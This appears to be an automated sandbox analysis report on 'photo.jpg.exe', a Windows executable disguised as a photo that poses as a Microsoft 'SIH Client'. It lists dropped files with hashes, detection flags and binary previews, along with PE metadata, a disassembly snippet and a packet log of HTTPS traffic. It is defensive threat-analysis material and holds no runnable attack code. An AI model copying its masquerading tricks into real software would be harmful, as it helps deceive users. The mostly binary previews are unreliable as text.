                                  Preview:L..................F.... ...).....................0......................f.:..DG..Yr?.D..U..k0.&...&.......bBDj.....^....m..........t...CFSF..1......Z.r..BE24A5~1....t.Y^...H.g.3..(.....gVA.G..k..........Z.r.Z.r...........................lB.b.e.2.4.a.5.a.2.-.f.6.6.3.-.4.e.9.3.-.b.e.6.2.-.2.d.c.9.9.e.b.7.c.3.1.e.0.4.2...D.f.2..0...Z.r .TASLogin.exe..J......Z.r.Z.r..........................4[..T.A.S.L.o.g.i.n...e.x.e.......q...............-.......p...................C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exe..?.....\.....\.t.i.n.a.\.b.e.2.4.a.5.a.2.-.f.6.6.3.-.4.e.9.3.-.b.e.6.2.-.2.d.c.9.9.e.b.7.c.3.1.e.0.4.2.\.T.A.S.L.o.g.i.n...e.x.e.6.C.:.\.U.s.e.r.s.\.t.i.n.a.\.b.e.2.4.a.5.a.2.-.f.6.6.3.-.4.e.9.3.-.b.e.6.2.-.2.d.c.9.9.e.b.7.c.3.1.e.0.4.2.\.........|....I.J.H..K..:...`.......X.......841675...........hT..CrF.f4... ..1.Y....0...E...hT..CrF.f4... ..1.Y....0...E..............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.2.2.4.6.1.2.2.6.5.8.-.
                                  Process:C:\Users\user\Desktop\photo.jpg.exe
                                  File Type:CSV text
                                  Category:dropped
                                  Size (bytes):1058
                                  Entropy (8bit):5.356262093008712
                                  Encrypted:false
                                  SSDEEP:24:ML9E4KlKDE4KhKiKhwE4Ty1KIE4oKNzKoZAE4KzeR:MxHKlYHKh3owH8tHo6hAHKzeR
                                  MD5:B2EFBF032531DD2913F648E75696B0FD
                                  SHA1:3F1AC93E4C10AE6D48E6CE1745D23696FD6554F6
                                  SHA-256:4E02B680F9DAB8F04F2443984B5305541F73B52A612129FCD8CC0C520C831E4B
                                  SHA-512:79430DB7C12536BDC06F21D130026A72F97BB03994CE2F718F82BB9ACDFFCA926F1292100B58B0C788BDDF739E87965B8D46C8F003CF5087F75BEFDC406295BC
                                  Malicious:true
                                  Reputation:moderate, very likely benign file
                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Net.Http, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Net.Http\bb5812ab3cec92427da8c5c696e5f731\System.Net.Http.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.X
                                  Process:C:\Users\user\Desktop\photo.jpg.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):2874368
                                  Entropy (8bit):7.999934316268863
                                  Encrypted:true
                                  SSDEEP:49152:hnfYYGvuZdRPnlEwCGyzldX0ob7jYdOPbyzLp7bUItHdwQU35hQnAAEag:9YYXRfmwZI7jYdOP+L9bjHZA5WAeg
                                  MD5:44F432C76EBF0B7BA26F37CE9CC70AEA
                                  SHA1:85290D88C50EEFABA2FB46F9474D91B8E2240B89
                                  SHA-256:7F7F25BD4A4AA47755D844ACFE3C88FF9BF38B03670EB32E0888A576C0E0D6A2
                                  SHA-512:1786867556E99FCFB78D2E1DD8CBA5845B70C8C977F2CFB9D30DA315B37ADF321C60C6BBE1987782A525761D8CF9B21159003FA8F2AB6248DD2FA6D79D9AEF79
                                  Malicious:false
                                  Preview:GB$..Ob...wX.WPi.83=.\B........SJ..../lw?......-.|b4.Q.?........7J.o`..5$..D/..#s.....z.......%.........K..6B.....?..kM..p...$...n..a..i.{...u.2.F.(....x.q1..+Z.Y..ym<..BL..]~i...4.......I.Z.O....f;.m..hP...51.CH......2..(w.m=.i..[1_<.p.6>e..X.k...ps....V&.D...q.=<k....>~...9B.....pv...*.9..........V*.=..s.6 ...i......p..P../.X........_..,......s.|.r.W.O\.E.71......Sg."...[..)...LKV{;.N...z<..Y,.H..Y_9|....P.^...+#V..?Q.p...`.c........Y..|cP....g..'u..>tI..h.E.,...f.&.{>..O.C.Ow....8..4...o......t........?.!o...z.a....K;Rc.mw.0.Q..B"..$%X-........h9...T6g......0jDEo.......6...P..is.......Q.X.<.H..n}.m.}.....W.....?......$.`P......w.9.T)m.Y.]..}..f0.h]....P.....t8.....Y.,:.......).J.....J...c.d,8.~'.G.. '.......?.../......u.C.cE...-g9../&..9.."...........Mb.?9r@....Y:..Z.....X..b..<..:....<..?3...,..."z4j....17w....@Q^Y..s.....E..<.(.pd..$...[..H.....~.)..:S.68..C.K.q..:.>4...c.......?F.N.?1b....i...-..^..Q.l..~B ...\l-.#..^s..Jn.pb..#.
                                  Process:C:\Users\user\Desktop\photo.jpg.exe
                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                  Category:dropped
                                  Size (bytes):995560
                                  Entropy (8bit):7.541566176079276
                                  Encrypted:false
                                  SSDEEP:12288:nAwfG7O+2Ui8WlJZ/zMytlbd7lrUJr3m2ntRr/lT154Ny0GmhK/QgA:nAl7ji8WlrL/tlbdpwtWg9f4NyiwC
                                  MD5:7CA41E122724C2D808BF73B7A5129365
                                  SHA1:9C1A7166898F7E8CB356A16F08E1C35A3551489C
                                  SHA-256:22BC3D36AD0A6E7793399515BA29F97B7E547E23946A88EE091DF9409EA1ADEA
                                  SHA-512:A4D9D03E73A2654247B344FE5966D65B5499CE1D57F89BD696F73FA7838478B2BD717ADBDA36AD8DF952FB062C1C97C2E29878492F8C9E51914F15C8A14BA592
                                  Malicious:false
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 3%
                                  Joe Sandbox View:
                                  • Filename: SIH Client.exe, Detection: malicious, Browse
                                  • Filename: SIH Client.exe, Detection: malicious, Browse
                                  • Filename: SIH Client.exe, Detection: malicious, Browse
                                  • Filename: SIH Client.exe, Detection: malicious, Browse
                                  • Filename: picture_20250316.exe.bin.exe, Detection: malicious, Browse
                                  • Filename: picture_20250316.exe.bin.exe, Detection: malicious, Browse
                                  • Filename: #U56fe#U7247_20250218.exe, Detection: malicious, Browse
                                  • Filename: #U56fe#U7247_20250218.exe, Detection: malicious, Browse
                                  Preview:MZ......................@...X...H.......NO{g............................!..L.!This program cannot be run in DOS mode....$........:...[.^.[.^.[.^.#i^.[.^..._.[.^..._.[.^..._.[.^..._.[.^C+._.[.^C+._.[.^.[.^.Z.^k.._.[.^k..^.[.^k.._.[.^Rich.[.^........................PE..L....L{g.................&...B......H........@....@.................................T?..........................................(.......................H'..............p...........................8...@............................................ace.....%.......................... ..`.ace....84...@...6..................@..@.ace....L............"..............@....ace.................6..............@..@.tvm0........`... .................. ..`.ace.....0..........................@..B.ace....N............4.............. ...................................................................................................................................................................................................................
                                  Process:C:\Users\user\Desktop\photo.jpg.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):11
                                  Entropy (8bit):2.481714572986073
                                  Encrypted:false
                                  SSDEEP:3:JWiIG:7
                                  MD5:D476FF5557309A1349660FAB8EFC4179
                                  SHA1:4FB2E72F75A75F7CB0B47C665FEC76A66EC00B56
                                  SHA-256:CEAE30EA5C346A2467F8477A90E65E3FFFAAB4149FA01FA982430BB7985AAD53
                                  SHA-512:2ADA181D479D8BE162B0386A3D69E162AE775E689A3CC1E353CE5A621FB28DBC7EA5FC02E3656442FAF9633DB13F3EB773BE220F391D2E6D2509172EB88D225B
                                  Malicious:false
                                  Preview:593.3115.56
                                  Process:C:\Users\user\Desktop\photo.jpg.exe
                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                  Category:dropped
                                  Size (bytes):13472
                                  Entropy (8bit):6.805301289944403
                                  Encrypted:false
                                  SSDEEP:192:t9illiy6iiXHVVFEQJ+KS35IVnEy2sE9jBF0NyIc4w:t9iiXVVFEQJVSJIVE8E9VF0NyI
                                  MD5:627B8BB2190258A6C4EC5D7049CFF9D8
                                  SHA1:8CF8E93B00BA6DEC18FC13D57E4C3FE303F43B7C
                                  SHA-256:97832F2274CF2CEC740F72FEB91C25FF884CF574A9F1C82D6918AF7370A358B1
                                  SHA-512:690754CABCCB40C113DF9DA3C1C26260A76D0994B96F10A8D59F7C8F67AC84E404DBF577CDFB46968658EA1FCE6A05E1D6FDDC060C351007A2BD291CF777C8AB
                                  Malicious:false
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........8U.Y;..Y;..Y;.ey)..Y;..F(..Y;.Rich.Y;.........PE..L...6..g...........!................'........ ...............................`...... ...............................p ..7.... ..(........................"...P.. .................................................... ...............................text...P........................... ..`.rdata....... ......................@..@.data...<....0......................@....]<_.........@...................... ..`.reloc.. ....P......................@..B........................................................................................................................................................................................................................................................................................................................................................................................
                                  Process:C:\Users\user\Desktop\photo.jpg.exe
                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                  Category:dropped
                                  Size (bytes):2399904
                                  Entropy (8bit):6.627616917199809
                                  Encrypted:false
                                  SSDEEP:24576:xpooLM/J/G0JSNK5vn4jKx77ocnFJnhAInaM9xM5AZBmSFXP1WBS43ZNQpUu/WpS:lMVGyR4jer5bcqZ4SFXaS43mU/pGp
                                  MD5:FE96DD18C9789C78A6011B6F9821D205
                                  SHA1:6DEA627584448604D0755706BE60671661D8940E
                                  SHA-256:D59A122C30F5EB8CAF63BEC3012F1F855E5BAA1D8E84DC56556D188DBCCED4B7
                                  SHA-512:A70B7042589AE4007BA068ADF148CF82E208DC56B1CDB62B510E29139F57FF20527CFDAA461948B92396B18A4AB445F12429F72CF3C6CAD0EDBD48A6906DA3E1
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 39%
                                  Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........PE..L...i.^d.................P .."......@j ......p ...@..........................@%.....)G%...............................!......0!..6....!..............|$.."...P"......................................................9!.`....p!......................text....3 ......4 ................. ..`.itext..X....P ......8 ............. ..`.data....W...p ..X...T .............@....bss....HY.... ..........................idata...6...0!..8.... .............@....didata......p!....... .............@....edata........!....... .............@..@.rdata..E.....!....... .............@..@.FCh..........!....... ............. ..`.rsrc.........!.......!.............@..@.reloc.......P".......!.............@..B.....................................................................................................0%......v$.............@..@........................................................
                                  Process:C:\Users\user\Desktop\photo.jpg.exe
                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, progressive, precision 8, 522x257, components 3
                                  Category:dropped
                                  Size (bytes):6420
                                  Entropy (8bit):7.14460281799718
                                  Encrypted:false
                                  SSDEEP:192:A8ph3RzMFOli8LQS1IGuqnQ8XWapMnRC546JM+1:AIDAAzs1cnQ8XWFGM+1
                                  MD5:23E20AEC94C80E49B5EA7893443E397E
                                  SHA1:28F5F23C3087B7895F4228869B2D97326F236661
                                  SHA-256:115E72F5371B08320C02B484E112EB8A419226EB60BD81319C8109EF84D24B39
                                  SHA-512:C3E5A2A4389772014BFF01F25B4BE1AD1001B4701B9C171B96C6688ABF645D10643D357D7DC271FC6E23373955D9D84359B6C0C6736F01A61A6C2B6A2AA44A89
                                  Malicious:false
                                  Preview:......JFIF.....`.`......ICC_PROFILE............@..mntrRGB XYZ ............acsp.......................................-Qt..................................................rXYZ........gXYZ........bXYZ........wtpt...,....cprt...@....rTRC...L... gTRC...L... bTRC...L... desc...l..._XYZ ......o...8.....XYZ ......b.........XYZ ......$.........XYZ .......O........text....N/A.para..........ff......Y.......[desc........sRGB..................................................................................C....................................................................C............................................................................"......................................................................................................3....;.....lc........1...@..sc.......1..lc.P.8....1.*..<.3.):...t...SF}..O>...N....&g...@...8.....'I...4g.........\.'I...4B..O>...N...t...SD.........\.'I...4B..|..V.. ...DV.Xq....V.XF...>}.XEa....XEa.r....Ea...@..............................dE..D
                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                  Entropy (8bit):6.177469545788914
                                  TrID:
                                  • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                  • Win32 Executable (generic) a (10002005/4) 49.97%
                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                  • DOS Executable Generic (2002/1) 0.01%
                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                  File name:photo.jpg.exe
                                  File size:289'438 bytes
                                  MD5:a5fb35b15c22b46a62905bf7a9f492bf
                                  SHA1:216a53be8dab4818a90044e5940cc3f13e8ab604
                                  SHA256:5727cc8ef222a2a0f24ed139bbd4de56b0f09806561074d40ed4d62e40df1ad5
                                  SHA512:16f17f102adb14d6b60402586740819f1f8f9597fc120a5bb01c74036b2dc2bb1d680dff797958b3b8e6c6312456618c34124cfb854b469d81cc164cd5c8e4bc
                                  SSDEEP:6144:PgKH/GJLaUurkNCnCnClQRKXa1vRUpyTz9kmiPZ:+JLZuTnLjXqWIV8Z
                                  TLSH:5A541818076CBE0BE58E6A33D4F1210C73B8A1B6E9D6D75614409B7D0FD13916E32BAE
                                  File Content Preview:MZ......................@...............SENS............................!..L.!This program cannot be run in DOS mode....$.......PE..L......g.........."...0..4..........d.... ...`....@.. ...............................l....`................................
                                  Icon Hash:90cececece8e8eb0
                                  Entrypoint:0x431c64
                                  Entrypoint Section:.text
                                  Digitally signed:true
                                  Imagebase:0x400000
                                  Subsystem:windows gui
                                  Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                  DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                  Time Stamp:0x67C31B9C [Sat Mar 1 14:37:16 2025 UTC]
                                  TLS Callbacks:
                                  CLR (.Net) Version:
                                  OS Version Major:4
                                  OS Version Minor:0
                                  File Version Major:4
                                  File Version Minor:0
                                  Subsystem Version Major:4
                                  Subsystem Version Minor:0
                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                  Signature Valid:
                                  Signature Issuer:
                                  Signature Validation Error:
                                  Error Number:
                                  Not Before, Not After
                                  Subject Chain
                                  Version:
                                  Thumbprint MD5:
                                  Thumbprint SHA-1:
                                  Thumbprint SHA-256:
                                  Serial:
                                  Instruction
                                      jmp dword ptr [00431C50h]
                                      add byte ptr [eax], al
                                      inc edx
                                      push ebx
                                      dec edx
                                      inc edx
                                      add dword ptr [eax], eax
                                      add dword ptr [eax], eax
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      or al, 00h
                                      add byte ptr [eax], al
                                      jbe 00007FA32471A3E6h
                                      xor byte ptr [esi], ch
                                      xor esi, dword ptr [eax]
                                      xor esi, dword ptr [ecx]
                                      cmp dword ptr [eax], eax
                                      add byte ptr [eax], al
                                      add byte ptr [00006C00h], al
                                      add byte ptr [eax], bh
                                      scasb
                                      add byte ptr [eax], al
                                      and edi, dword ptr [esi+00h]
                                      add byte ptr [esi+ebp*4+57C40000h], ah
                                      add byte ptr [eax], al
                                      and edx, dword ptr [ebx+74h]
                                      jc 00007FA32471A41Bh
                                      outsb
                                      jnc 00007FA32471A3B3h
                                      add byte ptr [eax], al
                                      add byte ptr [eax+06h], ch
                                      add dword ptr [eax], eax
                                      adc byte ptr [eax+eax], cl
                                      add byte ptr [ebx], ah
                                      push ebp
                                      push ebx
                                      add byte ptr [eax+12h], bh
                                      add dword ptr [eax], eax
                                      adc byte ptr [eax], al
                                      add byte ptr [eax], al
                                      and eax, dword ptr [edi+55h]
                                      dec ecx
                                      inc esp
                                      add byte ptr [eax], al
                                      add byte ptr [eax-13FFFEEEh], cl
                                      sub eax, dword ptr [eax]
                                      add byte ptr [ebx], ah
                                      inc edx
                                      insb
                                      outsd
                                      bound eax, dword ptr [eax]
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add al, byte ptr [eax]
                                      add byte ptr [ecx], al
                                      push edi
                                      mov edi, 1F093FA3h
                                      add byte ptr [eax], al
                                      add dl, bh
                                      add dword ptr [ebx], esi
                                      add byte ptr [esi], al
                                      add byte ptr [eax], al
                                      add dword ptr [eax], eax
                                      add byte ptr [eax], al
                                      out 00h, eax
                                      add byte ptr [eax], al
                                      add eax, 72000001h
                                      add eax, dword ptr [eax]
                                      add byte ptr [ebp-71FFFFFCh], ah
                                      add al, 00h
                                      add byte ptr [BB000000h], ch
                                      add al, byte ptr [eax]
                                      add byte ptr [ecx+65000001h], cl
                                      add byte ptr [eax], al
                                      add byte ptr [edx], cl
                                      add byte ptr [eax], al
                                      add byte ptr [ecx], dl
                                      add byte ptr [eax], al
                                      add byte ptr [B2000000h], bl
                                      add byte ptr [eax], al
                                      add byte ptr [edi], ah
                                      add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x31c0c | 0x28 | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x48000 | 0x5a4 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x44800 | 0x2298 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x46000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x51d4 | 0x38 | .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x31c50 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x45ae0 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x43ca8 | 0x43e00 | d25e30f39188a0d666404a6aa7391351 | False | 0.5067729914825047 | data | 6.107152038134895 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.reloc | 0x46000 | 0xc | 0x200 | 01502b5ef2a622b5d8a59d4254cdd621 | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.rsrc | 0x48000 | 0x5a4 | 0x600 | 1222d6e65212e96828c3502edd28a10b | False | 0.4388020833333333 | data | 4.553524253917224 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_VERSION | 0x480a0 | 0x318 | data | | | 0.45075757575757575
RT_MANIFEST | 0x483b8 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347
DLL | Import
mscoree.dll | _CorExeMain
Description | Data
FileVersion | 10.0.19041.5438
ProductVersion | 10.0.19041.5438
FileDescription | SIH Client
CompanyName | Microsoft Corporation
OriginalFilename | SIH Client
ProductName | Microsoft Windows Operating System
LegalCopyright | Microsoft Corporation. All rights reserved.
Translation | 0x0000 0x04b0


                                      • Total Packets: 995
                                      • 3158 undefined
                                      • 443 (HTTPS)
                                      • 53 (DNS)
                                      Apr 2, 2025 16:22:38.774924994 CEST4434968852.219.129.35192.168.2.9
                                      Apr 2, 2025 16:22:38.774960995 CEST4434968852.219.129.35192.168.2.9
                                      Apr 2, 2025 16:22:38.775018930 CEST4434968852.219.129.35192.168.2.9
                                      Apr 2, 2025 16:22:38.775041103 CEST49688443192.168.2.952.219.129.35
                                      Apr 2, 2025 16:22:38.775043011 CEST4434968852.219.129.35192.168.2.9
                                      Apr 2, 2025 16:22:38.775054932 CEST4434968852.219.129.35192.168.2.9
                                      Apr 2, 2025 16:22:38.775079966 CEST49688443192.168.2.952.219.129.35
                                      Apr 2, 2025 16:22:38.775089025 CEST4434968852.219.129.35192.168.2.9
                                      Apr 2, 2025 16:22:38.775114059 CEST49688443192.168.2.952.219.129.35
                                      Apr 2, 2025 16:22:38.775122881 CEST4434968852.219.129.35192.168.2.9
                                      Apr 2, 2025 16:22:38.775136948 CEST4434968852.219.129.35192.168.2.9
                                      Apr 2, 2025 16:22:38.775149107 CEST4434968852.219.129.35192.168.2.9
                                      Apr 2, 2025 16:22:38.775166988 CEST4434968852.219.129.35192.168.2.9
                                      Apr 2, 2025 16:22:38.775186062 CEST49688443192.168.2.952.219.129.35
                                      Apr 2, 2025 16:22:38.775186062 CEST49688443192.168.2.952.219.129.35
                                      Apr 2, 2025 16:22:38.775196075 CEST4434968852.219.129.35192.168.2.9
                                      Apr 2, 2025 16:22:38.775223970 CEST49688443192.168.2.952.219.129.35
                                      Apr 2, 2025 16:22:38.775238037 CEST4434968852.219.129.35192.168.2.9
                                      Apr 2, 2025 16:22:38.775264978 CEST4434968852.219.129.35192.168.2.9
                                      Apr 2, 2025 16:22:38.775296926 CEST4434968852.219.129.35192.168.2.9
                                      Apr 2, 2025 16:22:38.775329113 CEST4434968852.219.129.35192.168.2.9
                                      Apr 2, 2025 16:22:38.775341988 CEST49688443192.168.2.952.219.129.35
                                      Apr 2, 2025 16:22:38.775348902 CEST4434968852.219.129.35192.168.2.9
                                      Apr 2, 2025 16:22:38.775358915 CEST4434968852.219.129.35192.168.2.9
                                      Apr 2, 2025 16:22:38.775409937 CEST4434968852.219.129.35192.168.2.9
                                      Apr 2, 2025 16:22:38.775444984 CEST4434968852.219.129.35192.168.2.9
                                      Apr 2, 2025 16:22:38.775449991 CEST49688443192.168.2.952.219.129.35
                                      Apr 2, 2025 16:22:38.775449991 CEST49688443192.168.2.952.219.129.35
                                      Apr 2, 2025 16:22:38.775449991 CEST49688443192.168.2.952.219.129.35
                                      Apr 2, 2025 16:22:38.775460005 CEST4434968852.219.129.35192.168.2.9
                                      Apr 2, 2025 16:22:38.775473118 CEST4434968852.219.129.35192.168.2.9
                                      Apr 2, 2025 16:22:38.775520086 CEST4434968852.219.129.35192.168.2.9
                                      Apr 2, 2025 16:22:38.775556087 CEST4434968852.219.129.35192.168.2.9
                                      Apr 2, 2025 16:22:38.775571108 CEST4434968852.219.129.35192.168.2.9
                                      Apr 2, 2025 16:22:38.775572062 CEST49688443192.168.2.952.219.129.35
                                      Apr 2, 2025 16:22:38.775572062 CEST49688443192.168.2.952.219.129.35
                                      Apr 2, 2025 16:22:38.775572062 CEST49688443192.168.2.952.219.129.35
                                      Apr 2, 2025 16:22:38.775582075 CEST4434968852.219.129.35192.168.2.9
                                      Apr 2, 2025 16:22:38.775618076 CEST49688443192.168.2.952.219.129.35
                                      Apr 2, 2025 16:22:38.775671959 CEST4434968852.219.129.35192.168.2.9
                                      Apr 2, 2025 16:22:38.775701046 CEST4434968852.219.129.35192.168.2.9
                                      Apr 2, 2025 16:22:38.775732040 CEST4434968852.219.129.35192.168.2.9
                                      Apr 2, 2025 16:22:38.775738955 CEST49688443192.168.2.952.219.129.35
                                      Apr 2, 2025 16:22:38.775738955 CEST49688443192.168.2.952.219.129.35
                                      Apr 2, 2025 16:22:38.775754929 CEST4434968852.219.129.35192.168.2.9
                                      Apr 2, 2025 16:22:38.775767088 CEST4434968852.219.129.35192.168.2.9
                                      Apr 2, 2025 16:22:38.775774002 CEST49688443192.168.2.952.219.129.35
                                      Apr 2, 2025 16:22:38.775782108 CEST4434968852.219.129.35192.168.2.9
                                      Apr 2, 2025 16:22:38.775810003 CEST49688443192.168.2.952.219.129.35
                                      Apr 2, 2025 16:22:38.775815010 CEST4434968852.219.129.35192.168.2.9
                                      Apr 2, 2025 16:22:38.775856018 CEST4434968852.219.129.35192.168.2.9
                                      Apr 2, 2025 16:22:38.775881052 CEST4434968852.219.129.35192.168.2.9
                                      Apr 2, 2025 16:22:38.775907993 CEST4434968852.219.129.35192.168.2.9
                                      Apr 2, 2025 16:22:38.775918007 CEST49688443192.168.2.952.219.129.35
                                      Apr 2, 2025 16:22:38.775918007 CEST49688443192.168.2.952.219.129.35
                                      Apr 2, 2025 16:22:38.775924921 CEST4434968852.219.129.35192.168.2.9
                                      Apr 2, 2025 16:22:38.775938988 CEST4434968852.219.129.35192.168.2.9
                                      Apr 2, 2025 16:22:38.775957108 CEST4434968852.219.129.35192.168.2.9
                                      Apr 2, 2025 16:22:38.775963068 CEST49688443192.168.2.952.219.129.35
                                      Apr 2, 2025 16:22:38.776007891 CEST49688443192.168.2.952.219.129.35
                                      Apr 2, 2025 16:22:38.776011944 CEST4434968852.219.129.35192.168.2.9
                                      Apr 2, 2025 16:22:38.776034117 CEST4434968852.219.129.35192.168.2.9
                                      Apr 2, 2025 16:22:38.776041985 CEST4434968852.219.129.35192.168.2.9
                                      Apr 2, 2025 16:22:38.776051998 CEST49688443192.168.2.952.219.129.35
                                      Apr 2, 2025 16:22:38.776089907 CEST4434968852.219.129.35192.168.2.9
                                      Apr 2, 2025 16:22:38.776112080 CEST4434968852.219.129.35192.168.2.9
                                      Apr 2, 2025 16:22:38.776123047 CEST49688443192.168.2.952.219.129.35
                                      Apr 2, 2025 16:22:38.776123047 CEST49688443192.168.2.952.219.129.35
                                      Apr 2, 2025 16:22:38.776128054 CEST4434968852.219.129.35192.168.2.9
                                      Apr 2, 2025 16:22:38.776187897 CEST4434968852.219.129.35192.168.2.9
                                      Apr 2, 2025 16:22:38.776216984 CEST4434968852.219.129.35192.168.2.9
                                      Apr 2, 2025 16:22:38.776228905 CEST49688443192.168.2.952.219.129.35
                                      Apr 2, 2025 16:22:38.776228905 CEST49688443192.168.2.952.219.129.35
                                      Apr 2, 2025 16:22:38.776235104 CEST4434968852.219.129.35192.168.2.9
                                      Apr 2, 2025 16:22:38.776274920 CEST49688443192.168.2.952.219.129.35
                                      Apr 2, 2025 16:22:38.776282072 CEST4434968852.219.129.35192.168.2.9
                                      Apr 2, 2025 16:22:38.776314020 CEST4434968852.219.129.35192.168.2.9
                                      Apr 2, 2025 16:22:38.776340961 CEST49688443192.168.2.952.219.129.35
                                      Apr 2, 2025 16:22:38.776340961 CEST49688443192.168.2.952.219.129.35
                                      Apr 2, 2025 16:22:38.776344061 CEST4434968852.219.129.35192.168.2.9
                                      Apr 2, 2025 16:22:38.776354074 CEST4434968852.219.129.35192.168.2.9
                                      Apr 2, 2025 16:22:38.776388884 CEST4434968852.219.129.35192.168.2.9
                                      Apr 2, 2025 16:22:38.776408911 CEST4434968852.219.129.35192.168.2.9
                                      Apr 2, 2025 16:22:38.776411057 CEST49688443192.168.2.952.219.129.35
                                      Apr 2, 2025 16:22:38.776411057 CEST49688443192.168.2.952.219.129.35
                                      Apr 2, 2025 16:22:38.776422024 CEST4434968852.219.129.35192.168.2.9
                                      Apr 2, 2025 16:22:38.776459932 CEST49688443192.168.2.952.219.129.35
                                      Apr 2, 2025 16:22:38.776489973 CEST4434968852.219.129.35192.168.2.9
                                      Apr 2, 2025 16:22:38.776515007 CEST49688443192.168.2.952.219.129.35
                                      Apr 2, 2025 16:22:38.776520014 CEST4434968852.219.129.35192.168.2.9
                                      Apr 2, 2025 16:22:38.776556969 CEST49688443192.168.2.952.219.129.35
                                      Apr 2, 2025 16:22:38.776573896 CEST4434968852.219.129.35192.168.2.9
                                      Apr 2, 2025 16:22:38.776593924 CEST49688443192.168.2.952.219.129.35
                                      Apr 2, 2025 16:22:38.776598930 CEST4434968852.219.129.35192.168.2.9
                                      Apr 2, 2025 16:22:38.776640892 CEST49688443192.168.2.952.219.129.35
                                      Apr 2, 2025 16:22:38.776662111 CEST4434968852.219.129.35192.168.2.9
                                      Apr 2, 2025 16:22:38.776688099 CEST49688443192.168.2.952.219.129.35
                                      Apr 2, 2025 16:22:38.776725054 CEST4434968852.219.129.35192.168.2.9
                                      Apr 2, 2025 16:22:38.776818991 CEST49688443192.168.2.952.219.129.35
                                      Apr 2, 2025 16:22:38.776818991 CEST49688443192.168.2.952.219.129.35
                                      Apr 2, 2025 16:22:38.776860952 CEST4434968852.219.129.35192.168.2.9
                                      Apr 2, 2025 16:22:38.776904106 CEST4434968852.219.129.35192.168.2.9
                                      Apr 2, 2025 16:22:38.776928902 CEST4434968852.219.129.35192.168.2.9
                                      Apr 2, 2025 16:22:38.777005911 CEST4434968852.219.129.35192.168.2.9
                                      Apr 2, 2025 16:22:38.777019024 CEST49688443192.168.2.952.219.129.35
                                      Apr 2, 2025 16:22:38.777019024 CEST49688443192.168.2.952.219.129.35
                                      Apr 2, 2025 16:22:38.777031898 CEST4434968852.219.129.35192.168.2.9
                                      Apr 2, 2025 16:22:38.777045012 CEST4434968852.219.129.35192.168.2.9
